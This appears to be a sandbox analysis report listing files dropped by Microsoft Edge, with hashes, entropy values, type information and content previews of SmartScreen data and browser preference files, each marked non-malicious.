SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\customSynchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.922828737239167
Encrypted:	false
SSDEEP:	3:2NGw+K+:fwZ+
MD5:	7BAAFE811F480ACFCCCEE0D744355C79
SHA1:	24B89AE82313084BB8BBEB9AD98A550F41DF7B27
SHA-256:	D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
SHA-512:	70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
Malicious:	false
Preview:	customSynchronousLookupUris_0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\customSynchronousLookupUris_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	35302
Entropy (8bit):	7.99333285466604
Encrypted:	true
SSDEEP:	768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
MD5:	0E06E28C3536360DE3486B1A9E5195E8
SHA1:	EB768267F34EC16A6CCD1966DCA4C3C2870268AB
SHA-256:	F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
SHA-512:	45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
Malicious:	false
Preview:	.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-..F.1....g\|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a....6g3..%.gy../{\|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..\|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...\|$....;.k.......8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl........}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	18
Entropy (8bit):	3.5724312513221195
Encrypted:	false
SSDEEP:	3:kDnaV6bVon:kDYa2
MD5:	5692162977B015E31D5F35F50EFAB9CF
SHA1:	705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
SHA-256:	42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
SHA-512:	32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
Malicious:	false
Preview:	edgeSettings_2.0-0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\edgeSettings_2.0-0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3581
Entropy (8bit):	4.459693941095613
Encrypted:	false
SSDEEP:	96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
MD5:	BDE38FAE28EC415384B8CFE052306D6C
SHA1:	3019740AF622B58D573C00BF5C98DD77F3FBB5CD
SHA-256:	1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
SHA-512:	9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
Malicious:	false
Preview:	{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.493433469104717
Encrypted:	false
SSDEEP:	3:kfKbQSQSuLA5:kyUc5
MD5:	3F90757B200B52DCF5FDAC696EFD3D60
SHA1:	569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
SHA-256:	1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
SHA-512:	39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
Malicious:	false
Preview:	synchronousLookupUris_636976985063396749.rel.v2

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	35302
Entropy (8bit):	7.99333285466604
Encrypted:	true
SSDEEP:	768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
MD5:	0E06E28C3536360DE3486B1A9E5195E8
SHA1:	EB768267F34EC16A6CCD1966DCA4C3C2870268AB
SHA-256:	F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
SHA-512:	45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
Malicious:	false
Preview:	.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-..F.1....g\|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a....6g3..%.gy../{\|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..\|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...\|$....;.k.......8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl........}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	50
Entropy (8bit):	3.9904355005135823
Encrypted:	false
SSDEEP:	3:0xXF/XctY5GUf+:0RFeUf+
MD5:	E144AFBFB9EE10479AE2A9437D3FC9CA
SHA1:	5AAAC173107C688C06944D746394C21535B0514B
SHA-256:	EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
SHA-512:	837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
Malicious:	false
Preview:	topTraffic_170540185939602997400506234197983529371

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
MD5:	961E3604F228B0D10541EBF921500C86
SHA1:	6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
SHA-256:	F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
SHA-512:	535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\ab0664d8-d76b-4793-9096-f0a53bb812e5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2958
Entropy (8bit):	5.596337317712732
Encrypted:	false
SSDEEP:	48:YuBqDPEFMsFiHC0af/v1FIQUkHB+1drxJvB07+RpVDRG1PaJkXhocAwlRYz3nB0:Xq8NkC1f/tFIQ/B2/v27aGsJkicFYzXq
MD5:	E1B9950EC680C793CEE39C694C2EC0C8
SHA1:	CB4C731D6DC66C089373F79AA3ECDE25FCF4F3C1
SHA-256:	F801BC98AD0CACC16CE004ABC674EE7726A69977230FF1FC6A6A8419D3314C3B
SHA-512:	14F01C8AD0AEB05B7165A15842B1B7D8146B529330710D4EAF1331D98CD94B9CAA7A3F3557C1B8F72CDC68E3E05740F6724092B4B2E8ADA3E5B8B7169F087C5D
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"policy":{"last_statistics_update":"13369638492225873"},"profile":{"info_ca

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\d422fcac-f3a5-43d1-a3e9-8edf871a822c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3335
Entropy (8bit):	5.613024758049985
Encrypted:	false
SSDEEP:	96:0q8NkC1f/tFIQPjB2/v27pnsJkichsSDS4S4SDSRWI4a:/8NbFdfnskiYZT
MD5:	40952250B1CB645971FA61450EA35519
SHA1:	BF65952A8B06680E3A36BFC9EDA2FBE31B8710F9
SHA-256:	475F929E60481576F06FD32199ABCD514DE24CE5845495EC1BF30AF31FB9420B
SHA-512:	8588DE07C6E9D5A6924EF807A84B30B7175D258A8410327E796C39C45E9491B70F0EFF520FB2244CDCFC1DCC101FCB2A9CFE33EA814BF4C4E7D0AD14EC31D8FC
Malicious:	false
Preview:	{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"policy":{"last_statist

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\e1ac82b5-9b2a-403d-abd8-da1adc0e423d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\01410a2a-1086-4189-89ec-40ff6f68db88.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44673
Entropy (8bit):	6.095396015501174
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkB0FuZhDO6vP6OYQG8g8XiDjO+dehcGoup1Xl3jVz6:z/Ps+wsI7yOEg64QBggchu3VlXr4CRo1
MD5:	F3F587483DC3241936EDF00EC5A21002
SHA1:	254B3BAA223010705A7E1CC68BF19EF880DB9135
SHA-256:	BD119EE9DAC50A37F99965F17A454F4F42C0C579D21E8EF3C1C5CA83889592E1
SHA-512:	04E1FDED1DC968B719A90B74A5613C845C305201B09A786A7DE2C46DAD4A6FADE98D139218BD434ACD1FB2C74D9635D3EC0BB70A7ED77036063A79B186A29F7A
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\41858318-1893-40e2-ba21-78c292876deb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090729405485079
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMGwuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEU6Btbz8hu3VlXr4CRo1
MD5:	D136B83C0F72AC109E58F4D5BB1D4DAF
SHA1:	3E4C7365937F5797567CD1DBE17607A7EF7C21DA
SHA-256:	9706D4E0647DE69899B4149F58E571E631ACA77A7D991B38A3E5871FE90DA9DF
SHA-512:	D036600D52E8C0D1A1B73DAD1017CAA2FC56630680B9C4A6E9816C6C6E7113BE6440362C52537619BE5E3177F7B059BEA6C468064B214CB128A7C0C6A41FF86B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5ccd63e6-5fe0-45f7-87f3-f7babba9b71b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44673
Entropy (8bit):	6.095409992609704
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkB0FuZhDO6vP6OYQG8g8GiDjO+dehcGoup1Xl3jVz6:z/Ps+wsI7yOEg64QBgLchu3VlXr4CRo1
MD5:	B7ABCAD35B2564167D4E12CB2B06169B
SHA1:	C74B464B05BF3245192905C549B5CA92090BC60E
SHA-256:	16141E23817A369285A59B8298CA070B91717ED6A85D43D3E5159BC2075F903F
SHA-512:	ACCC0914E14461311A1803DD3B964C17307B7944767EB1AA0A9A46CA889B37AA422D3BAFDD6C7B115817E688665A09D3813C70D721B7B9BF6C75A9B64FB45B5D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6e115416-7625-44fa-9ce2-6f72b490d8c7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44673
Entropy (8bit):	6.095502643516643
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkB0FuZhDO6vP6OYQG8gQbi9P8fvFIwEcGoup1Xl3j0:z/Ps+wsI7yOEg64QBgJchu3VlXr4CRo1
MD5:	73F63022A11CA4BB6596FD9BCA51BE75
SHA1:	C49E69B66F67A3C4F9E988DA7AD0DDFFB0AB08A7
SHA-256:	108117479CBB79379AB34CC497A76B3B315B3EA9BD0C2E29660E6FA262E92988
SHA-512:	847327D7EC067F4D5BA13E20735D364554209738059BA505FE77D4F8A089AD919EA315C08DF81F75F9D3D47B9444286A09BE3A1654F0CCD65B6A1B724AB0CA49
Malicious:	false
